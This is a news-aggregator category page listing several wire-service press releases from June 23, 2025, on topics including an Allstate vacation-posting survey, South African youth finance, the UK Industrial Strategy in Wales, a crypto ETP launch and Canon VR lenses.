NewzIntel.com

    • Checkout Page
    • Contact Us
    • Default Redirect Page
    • Frontpage
    • Home-2
    • Home-3
    • Lost Password
    • Member Login
    • Member LogOut
    • Member TOS Page
    • My Account
    • NewzIntel Alert Control-Panel
    • NewzIntel Latest Reports
    • Post Views Counter
    • Privacy Policy
    • Public Individual Page
    • Register
    • Subscription Plan
    • Thank You Page

Category: Entertainment

  • MIL-OSI: Allstate survey: Nearly one third of active social media users may potentially risk a home break-in by posting online before or during a vacation trip

    Source: GlobeNewswire (MIL-OSI)

    MARKHAM, Ontario, June 23, 2025 (GLOBE NEWSWIRE) — Almost one third (32 per cent) of Canadian respondents to a survey that say they are active on social media post about their plans before or while traveling, a figure that rises to 51 per cent among those aged 18 to 34. Posting that beach vacation selfie while away could be putting the safety of their property at risk for theft because it also shares that their home is empty. The survey was conducted by Léger on behalf of Allstate Insurance Company of Canada (‘Allstate’) to explore how Canadians choose to share details about their vacation on social media before and during travel.

    Respondents to the survey reveal that 68 per cent of Canadian social media users plan to leave home for at least a few days this summer, with the highest rate among Gen Z and Millennials at 74 per cent and the lowest among those aged 55 and older. While 35 per cent of those staying within their province say they plan to post about their trip on social media, this proportion rises to 45 per cent among those planning to leave their province, and peaks at 51 per cent among travellers with international plans.

    Specifically, 9 per cent post before their trip to share their plans and 28 per cent post during the trip to show they are travelling. Young adults aged 18–34 are the most likely to publish content on social media during their vacation (39 per cent). Parents are more inclined to share (37 per cent) compared to those without children (30 per cent).

    In contrast, a majority (62 per cent) say their main concern is protecting their home from theft while they’re away. This priority is even stronger among people aged 55 and over — 69 per cent choose not to post before or during their vacation. However, 15 per cent of respondents say sharing on social media is more of a priority than keeping their home safe from a break-in.

    Allstate has launched a public education campaign about the risks of sharing vacation travel plans online and how Canadians can better protect their homes.

    Allstate Claims Data Shows August is a Target Month for Home Theft
    Analysis of Allstate’s in-house claims data over the last ten years reveals that property theft rises slightly over the summer, with August reaching a peak. Overall, the months of July through November are the busiest time for theft, making summer a critical period for home safety. As well, the claims data reveals Fridays rank highest for incidents, followed by Thursday, regardless of time of year.

    “While technology like smart cameras and alarm systems may offer peace of mind, oversharing on social media can put travellers’ homes and valuables at risk. I encourage Canadians to keep this in mind before sharing their travel plans and adventures online,” says Odel Laing, Agency Manager at Allstate Canada. “This doesn’t mean keeping all the excitement to yourself, but rather share the photos of your vacation when you return.”

    Allstate Encourages to Travel Smart this Summer

    Odel offers some advice that may help Canadians protect their homes from theft if they are planning on travelling this summer.

    • As a general rule, year-round, use your phone’s privacy settings to remove geolocation data from digital pictures and avoid sharing images of your street address or home number.
    • Before a trip, avoid posting countdowns. If the itch to share online is too great, create a smaller trusted chat group to keep those closest to you informed of your plans.
    • Setting social media accounts to “private” rather than public allows more control over who sees your content. Even then, keep dates and other travel plans vague.
    • Delay sharing details about your vacation adventure online until your return.
    • Discuss this approach with all household members, so they take the same precautions.
    • Review your home insurance policy with your insurance professional to ensure you have the right coverage for your needs.

    For more travel-related online safety advice, go to the GOOD HANDS® blog at blog.allstate.ca/safe-social-media-travel/.

    Léger Poll Methodology
    Allstate commissioned Léger to conduct a study among Canadians active on social media to better understand their online behaviour before, during and after their vacations and assess if they are in line with their level of concern towards home safety. In order to reach survey objectives, an online survey was conducted with 1,603 Canadians, aged 18 and over, who could express themselves in English or French, from April 17 to 20, 2025. It should be noted that due to the non-probabilistic nature of the sample (associated with any web survey), the calculation of the margin of error does not apply. For comparative purposes, a probabilistic sample of 1,603 respondents via web panel (including 1,352 respondents active on social media) would have a global margin of error of ± 2.45% 19 times out of 20. The margin of error would, however, increase for subgroups.

    About Allstate Insurance Company of Canada
    Allstate Insurance Company of Canada is a leading home and auto insurer focused on providing its customers prevention and protection products and services for every stage of life. Serving Canadians since 1953, Allstate strives to reassure both customers and employees with its “You’re in Good Hands®” promise. Allstate is committed to making a positive difference in the communities in which it operates through partnerships with charitable organizations, employee giving and volunteerism. To learn more, visit www.allstate.ca. For safety tips and advice, visit www.goodhandsadvice.ca

    For more information, please contact:
    Stephanie More
    Agnostic on behalf of Allstate Insurance Company of Canada
    416-912-5341
    smore@thinkagnostic.com 

    Maude Gauthier
    Capital-Image on behalf of Allstate Insurance Company of Canada
    514-915-9469
    mgauthier@capital-image.com

    Cody Gillen
    Public Relations Specialist
    905-475-4536
    cgillen@allstate.ca

    The MIL Network –

    June 23, 2025
  • MIL-OSI Africa: A toolkit for financial wellbeing, one rand, one habit, one goal at a time

    Source: South Africa News Agency

    By Thamsanqa Cele

    As Youth Month draws to a close for 2025, let us continue to keep in our minds, hearts and behaviours the courage the young people of the 1976 Soweto uprising, where they protested apartheid’s oppressive education policies, sparking a movement for
    equality. 

    Today, South Africa’s youth, 34.3% of the 60.6 million population, face significant economic challenges, including an over 60% unemployment rate. Rising living costs further strain budgets, making financial wellbeing critical. In honouring the 107 heroes, who were brave young people then, the young people of today face different kinds of challenges. Among them, financial well-being. Put differently, their own personal economic freedom. It is not an easy and straightforward world. Especially when considering the macro-economic environment. That said, it remains a personal journey that does not need to be tackled alone. We present a few of the many tools that young people may want to consider as they fight their way to financial well-being.

    The economic landscape

    South Africa’s youth face daunting economic hurdles. The unemployment rate for those aged 15–24 reached 62.4% in Q1 2025, while 40.4% of those aged 25–34 remain jobless. According to StatsSA, approximately 3.8 million young people are not in
    education, employment, or training (NEET), fostering a sense of hopelessness. Millions of young people are currently dependent on the lifeline of the Social Relief of Distress R370 grant. The high cost of living, driven by inflation, makes essentials like food,
    transport, and housing increasingly unaffordable. According to the South African Depression and Anxiety Group, financial stress affects ~60% of South Africans, contributing to anxiety and depression.

    Despite these lived challenges across the board, opportunities exist. Government initiatives like the National Youth Development Agency (NYDA) and Youth Employment Services (YES) program provides funding, training, and work experience. By combining these resources with sound financial habits, the youth stand a better chance of achieving financial well-being, managing money to meet needs, handling emergencies, achieving goals, and improving their lives. This fosters economic stability and enhances mental health, reducing stress and boosting happiness.

    Why money management matters

    Financial stress is often the root of broader challenges. A large-scale study found that greater financial worries, especially among unemployed and low-income individuals, significantly increase psychological distress. Money is tightly linked with mental and
    even physical health. Financial strain can cause anxiety, poor sleep, and strained relationships, but learning to manage money may reverse these ills. Think of financial wellness as preventive healthcare. Like nutrition or exercise, sound financial habits help guard against crisis. As behavioural finance and mental health experts note, emergency savings build control and agency, two essential buffers for mental well-being. There are many helpful tools to engage in a journey to financial well-being. Some of these are:

    Tool #1: Start Budgeting – Know Where Every Rand Goes 

    A simple budget rule is: Essentials (50%), Life (30%), Savings (20%). The 50/30/20 rule is proven to improve emotional wellness by instilling spending control. It is a simple approach: allocate 50% of income to necessities (rent, food, transport), 30% to wants (entertainment, dining out), and 20% to savings or debt repayment. The 20% for savings and debts must be treated as a holy grail of securing a bright financial future, especially if it is skewed towards Savings.

    Tool #2: Build an Emergency Fund – Your First Safety Net 

    Saving, even small amounts, is crucial for financial security. An emergency fund covering 3 – 6 months of expenses (e.g. R15 000–R30 000 for R5 000 monthly costs) protects against unexpected costs like medical bills or job loss. Start with R100 monthly; over time this builds a significant buffer. With competitive interest rates, Postbank’s Smart Save account helps savings grow. Our customers use this account as a stash away from their main accounts in other banks. Because if you can see it, you will be tempted to use it. Multiple global studies have shown that an emergency fund reduces financial stress, lowers anxiety and reduces the risk of depression.

    Tool #3: Embrace Psychological Resilience Through Discipline

    Financial resilience builds mental resilience. Psychology research defines resilience as adapting successfully under stress when you feel in control. Ability and optimism follow. Money habits support coping in crisis, improve mood, and encourage growth.
    Holistic benefits include:
    * Reduced anxiety and stress
    * Better sleep, which improves physical health
    * Better relationships and social connections
    * Increased ability to seize new opportunities (jobs, entrepreneurship)
    * Mental clarity to focus on education, personal development, and productivity at
    work

    Tool #4: Side Hustles and Entrepreneurship

    Relying on one income source is risky in South Africa’s economy. Additional income streams provide security and accelerate financial goals. Some of the possible side hustles:
    * Freelancing: use what you are good at or that you understand better to freelance
    in areas like writing, designing, teaching, dancing, djaying, babysitting, etc.
    * Selling products: Create and sell handmade goods.
    * Small business: With NYDA support, you can start a low-cost venture like a car wash
    or food stall. The agency offers grants up to R50 000 and training.
    * YES placements, PYEI learnerships, SETA internships, and NYDA entrepreneurship
    support offer stipends, work experience, and business training.
    * Self-employment through grants and youth schemes – e.g. creative sector
    assistance, can seed small enterprises.

    Self-empower by taking advantage of the government-provided WiFi hotspots so you can use data at low costs, if not for free. South Africa’s public WiFi hotspot network, driven by SA Connect, a government program under the Department of Communications and Digital Technologies, provincial initiatives, and NGOs like Project Isizwe and Think WiFi, is opening doors for youth across the country. These hotspots are more than data points – they are gateways to education, jobs, civic engagement, and digital inclusion. By embracing these opportunities, young South Africans can transform their futures— accessing knowledge, growing skills, and connecting to their communities.

    Tool #5: Self-Control – Curbing your enthusiasm

    Many fall prey to the impulse to use spending as therapy. Yes, it may be for some who can afford to. Many others, already living beyond their means, tend to fall even deeper into the trap due to impulse-buying, falling foul of peer pressure and a show-
    off mentality. Before you buy it, ask yourself, does it have to be bought now? Can it be saved up for? Can it wait a little longer?

    A final call: Youth Month as a financial rebirth 

    Youth Month 2025 should mark a shift in the narrative:
    * From scrambling to survive, to building resilience through structured money habits.
    * From job-seeking alone to leveraging free government opportunities and saving
    on the payoff.
    * From worrying in silence to growing confidence, emotional control, and direction.

    Postbank is the national savings bank, ready to support every young South African who earns, learns, or aspires—with practical tools and accessible accounts. Postbank is trusted by millions of customers who have saved billions of rands with us. We are here
    to support young people with products that suit their needs. Products like the Smart Saver Account – accessible, competitive and needing as little as you can afford to save When youth learn to manage money, with buffers, budgets, and purpose, they don’t
    just survive, they thrive.

    Let this Youth Month ignite a movement, fuelled by practical habits, economic inclusion, and holistic well-being. We invite every young person to begin with building a savings buffer and continue toward a life of stability and possibilities. Partnering with the youth can help us enable their destiny, one rand, one habit, one goal at a time.

    *Thamsanqa Cele is the Chief Commercial Executive at PostBank

    MIL OSI Africa –

    June 23, 2025
  • MIL-OSI Russia: Exclusive: China-Central Asia News Agency Forum is a vivid embodiment of the “Central Asia-China spirit” — deputy head of China Society for Public Diplomacy

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

    Source: People’s Republic of China – State Council News

    ASTANA, June 23 (Xinhua) — Holding events such as the China-Central Asia News Agency Forum is an effective step to implement the “Central Asia-China spirit” and an important element of China’s public diplomacy in the region, Qiu Xiaoqi, vice chairman of the China Society for Public Diplomacy, said in an exclusive interview with Xinhua on Saturday.

    As one of the outcomes of the Second China-Central Asia Summit, the forum was initiated and hosted by the Xinhua News Agency. It was attended by the heads of the Xinhua News Agency, the Television and Radio Complex of the President of the Republic of Kazakhstan, the Kyrgyz National News Agency “Kabar”, the National News Agency of Tajikistan “Khovar”, the Information Agency “Media-Turkmen” and the National News Agency of Uzbekistan.

    According to Qiu Xiaoqi, the people’s aspirations are the basis for the development of interstate relations. The “Central Asia-China Spirit”, as a strategic consensus of the leaders of China and the countries of the region, should be put into practice, which the people of all countries can accept.

    He noted that the forum is a kind of “transformer” of official and unofficial narratives. “Official cooperation plans need professional explanation and vivid presentation by the media and think tanks so that they become stories that can be understood and shared,” Qiu Xiaoqi said. According to him, the forum helps to transform ideas into concrete cooperation projects.

    He also stressed that such events serve as a “glue” to strengthen mutual trust and consensus. The China-Central Asia Cooperation Forum and the 3rd Silk Road International Communication Conference hosted events to discuss important topics, including regional connectivity, geopolitics, and cooperation in artificial intelligence. “This format of direct and open dialogue between representatives of different fields helps strengthen mutual trust, social foundations, and public opinion,” he said.

    According to Qiu Xiaoqi, the news agency forum and other similar events also serve as an “incubator” for China’s public diplomacy in Central Asia, bringing together representatives from governments, media, academia and other fields. The contacts and friendships established at the forum will continue beyond the conference halls. –0–

    MIL OSI Russia News –

    June 23, 2025
  • MIL-OSI United Kingdom: Industrial Strategy to boost growth and jobs in Wales

    Source: United Kingdom – Executive Government & Departments

    Press release

    Industrial Strategy to boost growth and jobs in Wales

    Modern Industrial Strategy will make the UK the best country to invest in and grow a business and support tens of thousands of new jobs in Wales.

    The UK’s Modern Industrial Strategy

    • Electricity costs for thousands of businesses to be slashed by up to 25%   
    • UK Government to establish a centre for doctoral training in semiconductors, led by Swansea University
    • Welsh businesses to benefit from innovation funding, access to finance, faster grid connections and better-equipped sites for expansion. 

    Wales is set for increased economic growth, billions in investment and tens of thousands of new jobs supported over the next decade as a result of the UK Government’s modern Industrial Strategy, which is published today (Monday 23 June).  

    The Strategy contains measures to forge a new relationship between business and government, making Wales and the UK the best place to start and scale up a business. 

    It will unlock growth across Wales, targeting areas of strength from the country’s strengths in aerospace in North Wales to the world’s first compound semiconductor cluster in South Wales.   

    More than 7,000 UK businesses are set to see their electricity bills slashed by up to 25%. British manufacturers currently pay some of the highest electricity prices in the developed world— in some cases, double the European average, while businesses looking to expand or modernise have faced delays when it comes to connecting to the grid.

    For too long these challenges have held back growth and made it harder for firms to compete globally. Today’s announcement marks a decisive shift — with government stepping in to support industry and unlock the UK’s economic potential.

    From 2027, the new British Industrial Competitiveness Scheme will reduce electricity costs by up to £40 per megawatt hour for over 7,000 electricity-intensive businesses in manufacturing sectors like automotive, aerospace and chemicals.

    These firms, which support over 300,000 skilled jobs across the UK will be exempt from paying levies such as the Renewables Obligation, Feed-in Tariffs and the Capacity Market — helping level the playing field and make them more internationally competitive. Eligibility and further details on the exemptions will be determined following consultation, which will be launched shortly.

    The UK Government is also increasing support for the most energy-intensive firms — like steel, chemicals, and glass — by covering more of the electricity network charges they normally have to pay through the British Industry Supercharger. These businesses currently get a 60% discount on those charges, but from 2026, that will increase to 90%. This means their electricity bills will go down, helping them stay competitive, protect jobs, and invest in the future.

    These reforms complement the government’s long-term mission for clean power, which is the only way to bring down bills for good by ending the UK’s dependency on volatile fossil fuel markets.

    The Industrial Strategy is a 10-year plan to promote business investment and growth and make it quicker, easier and cheaper to do business in the UK, giving businesses the confidence to invest and create 1.1 million good, well-paid jobs in thriving industries – delivering on this government’s Plan for Change. 

    Wales is already punching above its weight in many of the growth driving sectors set out in the Industrial Strategy. 

    The key measures for Wales are: 

    • More than £4bn for the advanced manufacturing sector in the UK over the next 5 years. Wales has a leading advanced manufacturing sector with companies such as Airbus based in Broughton in north Wales. 

    • UK Government to establish a centre for doctoral training in semiconductors, led by Swansea University, building on the world-leading cluster based in south Wales.   

    • A Defence Growth Deal cluster to build on Wales’s major strengths. The top five Ministry of Defence suppliers all have a footprint in Wales. 

    • A new British Business Bank champion for the Cardiff Capital Region to connect investors with businesses and kickstart growth. 

    • £30m for a Local Innovation Partnerships Fund in Wales to work with the Welsh Government and Innovate UK to grow innovation.  

    • The National Wealth Fund working with the Development Bank of Wales to identify and secure financing for investment projects in Wales. 

    • Support for the UK’s city regions and clusters by increasing the supply of investible sites through a new £600m Strategic Sites Accelerator, enhanced regional support from the Office for Investment, National Wealth Fund, and British Business Bank, and more. 

    • Strengthened support from the Office for Investment to help identify, shape and deliver strategic investment opportunities across the UK. 

    Prime Minister Keir Starmer said:  

    This Industrial Strategy marks a turning point for Britain’s economy and a clear break from the short-termism and sticking plasters of the past.

    In an era of global economic instability, it delivers the long term certainty and direction British businesses need to invest, innovate and create good jobs that put more money in people’s pockets as part of the plan for change.

    This is how we power Britain’s future – by backing the sectors where we lead, removing the barriers that hold us back, and setting out a clear path to build a stronger economy that works for working people. Our message is clear – Britain is back and open for business.

    Secretary of State for Wales Jo Stevens said: 

    Wales has huge potential and our government’s Industrial Strategy will harness the strengths of our businesses and workforce to drive growth and create jobs. 

    The strategy will support key sectors like aerospace and compound semiconductors while developing industries of the future like floating offshore wind where Wales is well-placed to be a world leader. 

    Our modern Industrial Strategy is built to last and make Wales one of the best places to invest and do business. Working alongside Welsh Government we will boost growth, raise wages and create wealth across our country.”  

    Business and Trade Secretary Jonathan Reynolds said: 

    We’ve said from day one Britain is back in business under this government, and the £100 billion of investment we’ve secured in the past year shows our Plan for Change is already delivering for working people. 

    Our Modern Industrial Strategy will ensure the UK is the best country to invest and do business, delivering economic growth that puts more money in people’s pockets and pays for our NHS, schools and military. 

    Not only does this Strategy prioritise investment to attract billions for new business sites, cutting-edge research, and better transport links, it will also make our industrial energy prices globally competitive.  

    Tackling energy costs and fixing skills has been the single biggest ask of us from businesses and the greatest challenge they’ve faced – this government has listened, and now we’re taking the bold action needed. Government and business working hand in hand to make working people better of is what this Government promised and what we will deliver.” 

    Sarah Williams-Gardener, Chair of Fintech Wales, said:

    We are delighted to see financial services recognised as a key sector in this Industrial Strategy. We look forward to working closely with the Government to help unlock the sector’s full potential. 

    The emphasis on AI and the compute power required to support its development is particularly welcome, as we begin to see generative AI driving innovation across financial services—empowering both providers and customers through the next generation of digital banking platforms.

    Frank Holmes, Founding Partner of Gambit Corporate Finance and Chair of the Cardiff Capital Region Investment Board, said: 

    Today’s announcements mark a timely and important shift towards a connected, strategic approach to economic growth. The renewed focus on industrial strategy and SME finance speaks directly to the opportunities we are unlocking in the Cardiff Capital Region. We have backed innovative and scalable businesses like Whisper TV, showcasing how tailored regional finance can drive job creation, innovation and global reach.  

    The UK’s commitment to extending SME access to finance aligns perfectly with the ecosystem we are building  in CCR as a proven delivery partner and a model for regional economic development.” 

    Louise Harris, CEO of Tramshed Tech in Cardiff, said: 

    The launch of the UK Government’s Industrial Strategy is a pivotal moment for our tech and innovation ecosystem. By aligning local strengths with national ambition, this strategy provides a powerful platform for Welsh businesses to grow, attract investment and lead in emerging sectors such as technology, advanced manufacturing, and creative industries.  

    This strategy recognises that innovation isn’t just about technology in isolation – it’s about creating sustainable, high-quality jobs while tackling real-world challenges. This approach will create the perfect environment for startups and scale-ups to thrive, knowing they have both the infrastructure, skills and strategic support to take their innovations from Wales to the world.” 

    The Industrial Strategy is a 10-year plan to promote business investment and growth and make it quicker, easier and cheaper to do business in the UK, giving businesses the confidence to invest and create good, well-paid jobs in thriving industries – delivering on this government’s Plan for Change. 

    Investment from private companies is essential to creating new jobs, growing the economy and securing public services. That is why the Strategy will also introduce measures to make it quicker, easier and more profitable for businesses to invest in the UK, with the aim of significantly increasing businesses investment and in key growth sectors by 2035 and helping to create 1.1 million well paid jobs across all corners of the UK. 

    It will realise Wales’ economic potential and raise wages and living standards to a level that the people of Wales deserve.  

    The UK Government’s plans address the main barriers to growth, making it easier and quicker to do business and invest in Wales.  

    The Strategy’s bold plan of action includes: 

    • Slashing electricity costs by 20-25% to level the playing field for energy-hungry industries like chemicals and key growth sectors like automotive. 

    • Unlocking billions in finance for innovative business, especially for SMEs by increasing British Business Bank capacity to £25.6 billion, crowding in tens of billions of pounds more in private capital.  

    • Reducing regulatory burdens by cutting the administrative costs of regulation for business by 25% and reduce the number of regulators.   

    • Boosting R&D spending to £22.6bn per year by 2029-30 to drive innovation across the IS-8, with more than £2bn for AI over the Spending Review, and £2.8bn for advanced manufacturing over the next ten years. This will leverage in billions more from private investors. Regulatory changes will further clear the path for fast-growing industries and innovative products such as biotechnology, AI, and autonomous vehicles.

    • Attracting elite global talent to our key sectors, via visa and migrations reforms and a new the Global Talent Taskforce.  

    • Revolutionising public procurement and reducing barriers for new entrants and SMEs to bolster domestic competitiveness.  

    Five sector plans have also been published today:

    • Advanced Manufacturing – Backing our Advanced Manufacturing sector with up to £4.3 billion in funding, including up to £2.8 billion in R&D over the next five years, with the aim of anchoring supply chains in the UK – from increasing vehicle production to 1.35 million, to leading the next generation of technologies for zero emission flight.

    • Clean Energy Industries – Doubling investment in Clean Energy Industries by 2035, with Great British Energy helping to build the clean power revolution in Britain with a further £700 million in clean energy supply chains, taking the total funding for the Great British Energy Supply Chain fund to £1 billion.

    • Creative Industries – Maximizing the value of our Creative Industries through a £380 million boost for film and TV, video games, advertising and marketing, music and visual and performing arts will improve access to finance for scale-ups and increase R&D, skills and exports.

    • Digital and Technologies – Making the UK the European leader for creating and scaling Digital and Technology businesses, with more than £2 billion to drive the AI Action Plan, including a new Sovereign AI Programme and targeting R&D investment at frontier technologies such as cyber security in Northern Ireland, semiconductors in Wales and quantum technologies in Scotland. 

    • Professional and Business Services – Ensuring our Professional and Business Services becomes the world’s most trusted adviser to global industry, revolutionising the sector across the world through adoption of UK-grown AI and working to secure mutual recognition of professional qualifications agreements overseas.

    ENDS

    Share this page

    The following links open in a new tab

    • Share on Facebook (opens in new tab)
    • Share on Twitter (opens in new tab)

    Updates to this page

    Published 23 June 2025

    MIL OSI United Kingdom –

    June 23, 2025
  • MIL-OSI China: Tianjin’s landmarks illuminated at night to welcome guests for 2025 Summer Davos forum

    Source: People’s Republic of China – State Council News

    Tianjin’s landmarks illuminated at night to welcome guests for 2025 Summer Davos forum

    Updated: June 23, 2025 16:07 Xinhua
    An aerial drone photo taken on June 17, 2025 shows a view along the Haihe River at night in north China’s Tianjin Municipality. The 2025 Summer Davos forum will be held here from June 24 to 26. Many landmark buildings in the city are illuminated against the curtain of night, presenting a dazzling array of colors to welcome guests from home and abroad. [Photo/Xinhua]
    An aerial drone photo taken on June 17, 2025 shows a city view at night in north China’s Tianjin Municipality. [Photo/Xinhua]
    An aerial drone photo taken on June 22, 2025 shows a view of the Tianjin Television Tower in north China’s Tianjin Municipality. [Photo/Xinhua]
    An aerial drone photo taken on June 21, 2025 shows a city view by the Haihe River at night in north China’s Tianjin Municipality. [Photo/Xinhua]
    An aerial drone photo taken on June 17, 2025 shows a city view at night in north China’s Tianjin Municipality. [Photo/Xinhua]
    An aerial drone photo taken on June 20, 2025 shows a view of the Tianjin Olympic Center Stadium in north China’s Tianjin Municipality. [Photo/Xinhua]
    This photo taken on June 20, 2025 shows a city view at night in north China’s Tianjin Municipality. [Photo/Xinhua]
    An aerial drone photo taken on June 22, 2025 shows a view of the Tianjin Television Tower in north China’s Tianjin Municipality. [Photo/Xinhua]

    MIL OSI China News –

    June 23, 2025
  • MIL-OSI: Official Launch of Virtune Coinbase 50 Index ETP Marked by Bell Ringing in Frankfurt

    Source: GlobeNewswire (MIL-OSI)

    Stockholm, June 23, 2025 – Virtune, the Swedish regulated crypto asset manager, celebrated the official launch of its latest exchange-traded product, the Virtune Coinbase 50 Index ETP, with a ceremonial bell ringing at Deutsche Börse Xetra in Frankfurt on June 17, together with Coinbase.

    The ceremony, held together with Coinbase, marks a significant milestone in Virtune’s European expansion and reinforces its position as a leading issuer of regulated, physically backed crypto ETPs. The product is available to Swedish investors via online brokers such as Avanza and Montrose.

    Virtune listed the product on Xetra on June 2, 2025, making the Virtune Coinbase 50 Index ETP the first ETP in Europe to track the Coinbase 50 Europe Index – a broadly diversified index representing up to 50 leading crypto assets. The index is developed by Coinbase and administered by MarketVector Indexes™. Currently, the product holds 21 crypto assets, with the expansion to include all 50 assets subject to regulatory and exchange approvals.

    The Coinbase 50 Europe Index is designed to become the crypto market’s equivalent of the S&P 500, aiming to provide investors with a comprehensive and representative selection of the largest and most relevant crypto assets in the market. The product targets both institutional and retail investors seeking regulated, transparent, and professional exposure to digital assets.

    Christopher Kock, CEO of Virtune:
    “This ceremony clearly signals our long-term commitment to the European market. Standing on the podium in Frankfurt with our partners from Coinbase and MarketVector reflects the strength of collaboration, innovation, and regulated growth. We are here to help shape the future of crypto investing in Europe.”

    The Virtune Coinbase 50 Index ETP is available to both institutional and retail investors across Europe and is traded in EUR. The product is 100% physically backed by the underlying crypto assets, which are stored with institutional-grade security by Coinbase, and has an annual fee of 0.95%.

    Learn more about the product here:
    www.virtune.com/product/vcoin50

    Key Information about the Product:
    Exposure:
    Exposure to up to 50 leading crypto assets in one product
    Underlying assets:
    100% physically backed by the underlying crypto assets
    Custody:
    Institutional-grade custody by Coinbase
    Management Fee:
    0.95% per annum
    Trading currency:
    EUR
    First day of trading:
    Monday, 2nd of June 2025
    Bloomberg Ticker: 
    VCOIN50
    ISIN:
    SE0024738389
    WKN:
    A4A5D4
    Exchange ticker: 
    VRTC
    Exchanges:
    Deutsche Börse Xetra

    For questions, contact:
    Christopher Kock, CEO & Member of the Board of Directors
    Mobile: +46 70 073 45 64
    Email: christopher@virtune.com

    About Virtune AB (Publ):
    Virtune with its headquarters in Stockholm is a regulated Swedish digital asset manager and issuer of crypto exchange traded products on regulated European exchanges. With regulatory compliance, strategic collaborations with industry leaders and our proficient team, we empower investors on a global level to access innovative and sophisticated investment products that are aligned with the evolving landscape of the global crypto market.

    Crypto investments are associated with high risk. Virtune does not provide investment advice; investments are made at your own risk. Securities may increase or decrease in value, there is no guarantee of getting back invested capital. Read the prospectus, KID, terms at virtune.com.

    The Coinbase 50 Europe Index (“Index”) is the exclusive property of MarketVector Indexes GmbH (“MarketVector”) and its Licensors and has been licensed for use by Virtune AB (Publ) (“Licensee”). MarketVector has contracted with CC Data Limited to maintain and calculate the Index. CC Data Limited uses its best efforts to ensure that the Index is calculated correctly. Irrespective of its obligations towards MarketVector, CC Data Limited has no obligation to point out errors in the Index to third parties. In particular, MarketVector is not responsible for the Licensee and/or for Licensee’s legality or suitability and/or for Licensee’s business offerings. Offerings by Licensee, may they be based on the Virtune Coinbase 50 Europe ETP (“Product”) or not, are not sponsored, endorsed, sold, or promoted by MarketVector and any of its affiliates, and MarketVector and any of its affiliates make no representation regarding the advisability of investing in Licensee and/or in Licensee’s business offerings. MARKETVECTOR AND ANY OF ITS AFFILIATES AND ANY OF ITS LICENSORS MAKE NO WARRANTIES AND BEAR NO LIABILITY WITH RESPECT TO LICENSEE.

    The MIL Network –

    June 23, 2025
  • MIL-OSI Africa: Canon makes its EOS VR SYSTEM compatible with “Apple Projected Media Profile” and “spatial photo” in an aim to expand the 3D VR market and strengthens collaboration with Apple

    Canon Inc. (www.Canon-CNA.com) announced that two of its RF lenses for 3D VR video — the RF5.2mm F2.8 L DUAL FISHEYE (released in December 2021) and the RF-S3.9mm F3.5 STM DUAL FISHEYE (released in June 2024) — will offer compatibility with “Apple Projected Media Profile” (hereafter “APMP”), a QuickTime movie profile that will be supported by the Apple Vision Pro spatial computer developed by Apple Inc. (hereafter “Apple”) [1]. Canon has also announced that it will make its RF-S7.8mm F4 STM DUAL lens (released in November 2024) compatible with “spatial photo,” and that it will help to further expand the 3D VR market through collaboration with Apple going forward.

    Canon launched the EOS VR System for capturing VR video in 2021, and since then has met the needs for VR video production in diverse fields including entertainment, tourism, and education. In June 2024, the company announced the RF-S7.8mm F4 STM DUAL, a lens capable of recording “spatial video,” which is a type of 3D footage with a sense of depth, for the Apple Vision Pro. Through these developments, Canon has been helping to expand the range of expression available in 3D VR.

    At the Worldwide Developers Conference (WWDC), hosted by Apple on June 9, 2025, Apple announced visionOS 26, the newest OS for the Apple Vision Pro. In conjunction with this announcement, two of Canon’s RF lenses for 3D VR video, RF5.2mm F2.8 L DUAL FISHEYE and RF-S3.9mm F3.5 STM DUAL FISHEYE, will offer native playback of “APMP,” which will be supported by visionOS 26, scheduled to be released in the latter half of 2025. Specifically, footage shot with these lenses and compatible cameras [2] can be converted to “APMP” using the EOS VR Utility [3] app, making it even easier for users to enjoy a high-quality, immersive experience with the Apple Vision Pro.

    By updating EOS VR Utility, the RF-S7.8 mm F4 STM DUAL will also be able to handle not only “spatial video” but also “spatial photo,” which is a 3D image that allows users to enjoy a sense of depth as a still image, when combined with Canon’s mirrorless camera models EOS R7 (released in June 2022) and EOS R50 V (released in May 2025). Additionally, in mid-July 2025, the EOS R50 (released in March 2023) will also be made compatible with the EOS VR SYSTEM through a firmware update, thereby enabling both “spatial video” and “spatial photo.”

    Going forward, Canon will further strengthen the EOS VR SYSTEM in collaboration with Apple to meet the creative needs of pro users who strive to produce stunning immersive video as they explore new ways of storytelling.


    [1] Apple Vision Pro, QuickTime, and visionOS are trademarks of Apple Inc.

    [2] RF5.2mm F2.8 L DUAL FISHEYE can be mounted on the following cameras: EOS R5 (July 2020), EOS R5C (March 2022), EOS R6 Mark II (December 2022), EOS R5 Mark II (August 2024), EOS C400 (September 2024), EOS C80 (November 2024). RF-S3.9 mm F3.5 STM DUAL FISHEYE can be mounted on: EOS R7, EOS R50 V. As of June 9th, 2025.

    [3] “APMP,” “spatial video” and “spatial photo” are only supported by the macOS version of EOS VR Utility. Some features may require a fee.

    Distributed by APO Group on behalf of Canon Central and North Africa (CCNA).

    Media enquiries, please contact:
    Canon Central and North Africa
    Mai Youssef
    e. Mai.youssef@canon-me.com

    APO Group – PR Agency
    Rania ElRafie
    e. Rania.ElRafie@apo-opa.com

    About Canon Central and North Africa:
    Canon Central and North Africa (CCNA) (www.Canon-CNA.com) is a division within Canon Middle East FZ LLC (CME), a subsidiary of Canon Europe. The formation of CCNA in 2016 was a strategic step that aimed to enhance Canon’s business within the Africa region – by strengthening Canon’s in-country presence and focus. CCNA also demonstrates Canon’s commitment to operating closer to its customers and meeting their demands in the rapidly evolving African market.

    Canon has been represented in the African continent for more than 15 years through distributors and partners that have successfully built a solid customer base in the region. CCNA ensures the provision of high quality, technologically advanced products that meet the requirements of Africa’s rapidly evolving marketplace. With over 100 employees, CCNA manages sales and marketing activities across 44 countries in Africa.

    Canon’s corporate philosophy is Kyosei (http://apo-opa.co/3TAiM29) – ‘living and working together for the common good’. CCNA pursues sustainable business growth, focusing on reducing its own environmental impact and supporting customers to reduce theirs using Canon’s products, solutions and services. At Canon, we are pioneers, constantly redefining the world of imaging for the greater good. Through our technology and our spirit of innovation, we push the bounds of what is possible – helping us to see our world in ways we never have before. We help bring creativity to life, one image at a time. Because when we can see our world, we can transform it for the better.

    For more information: www.Canon-CNA.com

    MIL OSI Africa –

    June 23, 2025
  • Any Iranian closure of Hormuz Strait would be ‘extremely dangerous’, EU’s top diplomat says

    Source: Government of India

    Source: Government of India (4)

    An Iranian closure of the Strait of Hormuz would be dangerous and “not good for anybody”, the European Union’s top diplomat said on Monday.

